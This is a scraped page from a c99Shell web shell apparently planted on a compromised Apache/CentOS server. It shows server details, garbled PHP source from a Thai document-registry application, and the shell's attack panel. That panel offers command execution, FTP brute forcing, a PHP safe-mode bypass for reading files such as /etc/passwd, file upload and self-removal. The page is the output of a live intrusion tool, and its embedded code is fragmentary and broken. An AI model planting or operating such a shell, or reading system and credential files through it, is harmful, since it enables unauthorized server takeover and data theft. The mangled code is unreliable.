!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/person/admin/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showEndDoc.php (26.79 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
SearchMaxDocGroup(); if($DLCID && $one_position!="1"){ include_once "selectposition.php"; ?> SearchByKey($DLCID); $oDlc->GetRecord(); $oDoc->SearchByKey($DocID); $oDoc->GetRecord(); $oRs5->SearchByKey($DrsID);$oRs5->GetRecord(); //echo $DLCID."
"; //echo $oDlc->personId; ?>
">ลงทะเบียนใหม่/เสนอหนังสือ รายละเอียดข้อมูลทะเบียนหนังสือ
" size="3">รายละเอียดข้อมูลทะเบียนหนังสือ
ลงทะเบียน
">
" size="2">  รายละเอียดของหนังสือ: " size="2"> SearchShowRsName(1); }else if($RsID==2){ echo $oRSt->SearchShowRsName(2); }else if($oDoc->RsID==3){ echo $oRSt->SearchShowRsName(3); }else if($RsID==4){ echo $oRSt->SearchShowRsName(4); } ?> " size="2"> ชนิดหนังสือ: " size="2"> SearchByKey($DtID); $oDt->GetRecord(); echo $oDt->DtName; ?>
">
DtID==3 || $DtID==14 || $DtID==13){?> DocforSign=="Y"){ ?> sendToPs=="Y"){ ?>
 
">  : "> DocNo!=""){ echo $oDoc->DocNo; } ?>
">  :"> DocDate!="" && $oDoc->DocDate!="0000-00-00"){ echo " ".abbreDate2($oDoc->DocDate,'/'); } ?>
" >  :"> DocSubject!=""){ echo $oDoc->DocSubject; } ?>
">  : "> DocFrom!=""){ echo $oDoc->DocFrom; } ?>
"> ชื่อผู้ได้รับการรับรอง : "> CertificatePs!=""){ echo $oDoc->CertificatePs; } ?>
">  : "> DocTo!=""){ echo $oDoc->DocTo; }?>
"> แฟ้มหนังสือ : "> DocPID=="0" || $oDoc->DocPID==""){ $searchDoc=$oDoc->DocID; }else{ $searchDoc=$oDoc->DocPID; } ?> ">   แฟ้มที่เกี่ยวข้อง CountDocByDocID($searchDoc)); ?> รายการ
 SearchByDocID($searchDoc); while($oDatt->GetRecord()){ $c++; $pathfile="../documents/".$oDatt->DaUpFileName; ?>  เปิดดูแฟ้มหนังสือ  DaFileName."
"; } ?>
"> อ้างถึง :"> DocRef!=""){ echo $oDoc->DocRef; } ?>
"> สิ่งที่ส่งมาด้วย :"> DocOther!=""){ echo $oDoc->DocOther; }?>
"> อ้างถึงหนังสือเพื่อตอบกลับ :"> DocRefAns!=""){ echo $oDoc->DocRefAns; } ?>
"> ชั้นความเร็ว : "> SearchByKey($oDoc->DslID); $oDsl->GetRecord(); echo " ".$oDsl->DslName;?>
"> ชั้นความลับ :"> SearchByKey($oDoc->DclID); $oDcl->GetRecord(); echo " ".$oDcl->DclName;?>
"> หมายเหตุ : "> DocShortDesc!=""){ echo " ".$oDoc->DocShortDesc; } ?>
    ลงทะเบียนหนังสือลงนาม
    ส่งด่วน
     " size="2"> endDoc=="Y"){ echo "checked"; } ?> disabled> ยุติหนังสือ
 

RsID=="3"){ if($oDlc->DlcView=="Y"){ $lineDoc=GetLineDoc($DocID,$oDoc->DocGroup,$oDoc->DsID,$DrsID); $checkshow=0; if($lineDoc!=$DrsID){ $lineDoc=$lineDoc.$oRs5->DrsID; $checkshow=1;} //echo "=".$lineDoc."
"; ?>
  
" size="2"> เส้นทางเดินของหนังสือข้อมูลการลงรับหนังสือ

SearchByKey($line); $oRs2->GetRecord(); $oDoc2->SearchByKey($oRs2->DocID); $oDoc2->GetRecord(); $oDlc3->SearchByKey($oDoc2->DlcID); $oDlc3->GetRecord(); if($oRs2->DsID=="1"){ ?>
  ข้อมูลการลงรับของหน่วยงาน SearchByKey($oDlc3->deptId); $oDP->GetRecord(); echo $oDP->deptName;?>
  ชนิดหนังสือ : SearchByKey($oDoc2->DtID); $oDt->GetRecord(); echo $oDt->DtName; ?> เลขทะเบียนRsID);?> : DocTypeNo);?> วันที่ลงทะเบียน : DocDateCreate); echo abbreDate2($DocD,'/')." ".a2th($DocT); ?>
  ลงรับโดย : SearchByKey($oRs2->DrsReceivePersonId); $oPS->GetRecord(); ?> prefixId).$oPS->fName." ".$oPS->lName; ?> SearchByKey($oDlc3->DlpID); $oDlp->GetRecord(); echo " (".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->deptName).")"; ?>
DsID=="2"){ ?> SearchByKey($oRs2->DrsFromDrsID); $oRs3->GetRecord(); ?>
  ข้อมูลการเสนอลงนาม
">  การบันทึกต่อเนื่อง : "> DrsPropose); ?>
">  ผู้เสนอลงนาม : " align="center"> SearchByKey($oRs2->DrsPsIDCreate); $oPS->GetRecord(); ?> prefixId).$oPS->fName." ".$oPS->lName." "; ?> SearchByKey($oRs2->DrsDlcIDCreate); $oDlc5->GetRecord(); $oDlp->SearchByKey($oDlc5->DlpID); $oDlp->GetRecord(); echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).") "; list($DocD,$DocT) = split(' ',$oRs2->DrsReceiveDate ); echo abbreDate2($DocD,'/')." ".a2th($DocT); ?>
DrsWSign=='Y'){ //case DrsWSign $oDws->SearchByDrsIDDocID($oRs2->DrsID,$oRs2->DocID); $oDws->GetRecord(); ?>
  ข้อมูลการรอเสนอผอก./หน.
">  การบันทึกต่อเนื่อง : "> DocSign); ?>
">  ผู้ลงนาม : " align="center"> SearchByKey($oDws->personId); $oPS->GetRecord(); ?> prefixId).$oPS->fName." ".$oPS->lName." "; ?> SearchByKey($oDws->DlcID); $oDlc5->GetRecord(); $oDlp->SearchByKey($oDlc5->DlpID); $oDlp->GetRecord(); echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).") "; list($DocD,$DocT) = split(' ',$oDws->signDateTime); echo abbreDate2($DocD,'/')." ".a2th($DocT); ?>
DsID=="3"){ $oRs4->SearchByKey($oRs2->DrsFromDrsID); $oRs4->GetRecord(); if($oRs4->DrsByPass!="Y"){ ?>
  ข้อมูลการลงนาม
">  การบันทึกต่อเนื่อง : "> DrsSign); ?>
">  ผู้ลงนาม : " align="center"> SearchByKey($oRs2->DrsPsIDCreate); $oPS->GetRecord(); ?> prefixId).$oPS->fName." ".$oPS->lName." "; ?> SearchByKey($oRs2->DrsDlcIDCreate); $oDlc5->GetRecord(); $oDlp->SearchByKey($oDlc5->DlpID); $oDlp->GetRecord(); echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).") "; list($DocD,$DocT) = split(' ',$oRs2->DrsReceiveDate ); echo abbreDate2($DocD,'/')." ".a2th($DocT); ?>
DsID=="0" || $oRs2->DsID=="4" || $oRs2->DsID=="5"){ ?> DrsSendDate!="0000-00-00 00-00-00"){ //show status=3 send to person ?> SearchByKey($oRs2->DrsID); $oRs6->GetRecord(); //echo "DrsID=".$oRs6->DrsID."
"; ?> PtID!=0 && $oRs6->PtID!=""){ $oPt->SearchByKey($oRs6->PtID); $oPt->GetRecord(); ?> DrsSendDocNew!="0000-00-00 00:00:00"){ ?> AnID!=0 && $oRs6->AnID!=""){ $oAn->SearchByKey($oRs6->AnID); $oAn->GetRecord(); ?> SearchByKey($oRs6->DocID); $oDoc3->GetRecord(); if($oRs6->DrsDocDueDate!="0000-00-00"){ ?>
  ข้อมูลการส่งถึงผู้รับผิดชอบ
">  ส่งเพิ่มเติม : ">    DrsSendDocNew); echo abbreDate2($DocD2,'/')." ".a2th($DocT2); ?>
">  ลักษณะหนังสือ : ">    PtName; ?>
">  ข้อมูลขึ้นเว็บ : ">    AnName; ?>
    แจ้งขึ้นเว็บ DocShowInOut); ?>
    วันที่ประกาศขึ้นเว็บ  DrsstartDatePost!="0000-00-00"){ if($oRs6->DrsstartDatePost==$oRs6->DrsendDatePost){ echo abbreDate2($oRs6->DrsstartDatePost,'/'); }else{ echo abbreDate2($oRs6->DrsstartDatePost,'/')." ถึง ".abbreDate2($oRs6->DrsendDatePost,'/'); } } ?>
">  การบันทึกต่อเนื่อง : "> DrsPropose); ?>
">  ผู้ส่งหนังสือ : " align="center"> SearchByKey($oRs6->DrsPsIDCreate); $oPS->GetRecord(); ?> prefixId).$oPS->fName." ".$oPS->lName." "; ?> SearchByKey($oRs6->DrsDlcIDCreate); $oDlc5->GetRecord(); $oDlp->SearchByKey($oDlc5->DlpID); $oDlp->GetRecord(); echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).") "; $oRs8->SearchByKey($oRs6->DrsFromDrsID); $oRs8->GetRecord(); list($DocD,$DocT) = split(' ',$oRs8->DrsSendDate); echo abbreDate2($DocD,'/')." ".a2th($DocT); ?>
">  กำหนดระยะเวลาดำเนินการ : ">    ภายในวันที่ DrsDocDueDate,'/');?>
 
" size="2"> หมายเหตุ :   " size="2">คลิกเพื่อเปิดดูแฟ้มหนังสือ
  " size="2"> 

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--